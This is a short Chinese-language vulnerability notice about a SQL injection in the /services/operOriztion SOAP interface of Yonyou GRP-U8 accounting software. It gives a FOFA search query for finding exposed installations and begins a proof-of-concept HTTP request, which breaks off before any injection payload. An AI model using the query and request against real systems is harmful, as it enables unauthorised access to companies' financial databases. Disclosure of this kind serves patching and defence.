0x01 产品简介
用友GRP-U8是一款功能全面的会计软件,适用于企业的财务管理需求。它提供了财务核算、财务分析、资产管理等全面的财务管理功能,实现了会计凭证自动生成、科目余额表生成等功能,大大简化了手动处理的繁琐过程。此外,该软件还具备数据备份、恢复等安全措施,确保企业财务数据的安全性。
0x02 漏洞概述
用友GRP-U8 /services/operOriztion接口存在SQL注入漏洞,未授权的攻击者可以通过该漏洞获取数据库敏感信息。
0x03 测绘语句
fofa: app="用友-GRP-U8"
0x04 漏洞复现
POST /services/operOriztion HTTP/1.1Host:Content-Type: text/xml;charset=UTF-8SOAPAction: ""<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsdd="http://xml.apache.org/axis/wsdd/"><soapenv:Header/><soapenv:Body>&l